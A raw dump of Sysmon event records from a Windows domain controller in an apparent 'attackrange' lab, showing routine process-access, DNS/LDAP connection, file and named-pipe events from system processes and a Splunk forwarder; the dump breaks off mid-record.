12:02:27.318{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000006229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.998{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65019- 354300x80000000000000006228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.997{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57143- 354300x80000000000000006227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.996{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53582-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000006226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.996{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53582-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x80000000000000006225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.147{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Notifications\WPNPRMRY.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.131{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.131{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.084{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=355C6F216BC54A77A2A4FE72407DF730,SHA256=90E927953C8AEEAFA56EE0206A6A41A8265CC94D740AF5799C6AA2EF4F170AF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.069{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7DA4BCA9C5A66EF83D9DF9C03420209B,SHA256=D8134EBDDC65F31B42CCA335F4BA74F4BFC97D38985360D5BCD7AB811D137851,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.985{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.985{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.969{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.954{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f967|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.954{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+146dc|C:\Windows\SYSTEM32\psmserviceexthost.dll+f903|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.954{266CAFBE-64C4-6064-9C00-00000000AE01}46201988C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.954{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.954{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.860{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D85863617F0AEB4EADC36E7EA8BCB55,SHA256=2E5755AF8AB4EDE92B8F18C02AFF465962AC843DD82897F4C37F66215C110573,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000006431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:28.782{266CAFBE-64D3-6064-B600-00000000AE01}5544\TDLN-5544-41C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe 17141700x80000000000000006430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:02:28.782{266CAFBE-647D-6064-3300-00000000AE01}2520\TDLN-5544-41C:\Windows\system32\svchost.exe 10341000x80000000000000006429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-647D-6064-3300-00000000AE01}25205160C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-647D-6064-3300-00000000AE01}25205160C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.767{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 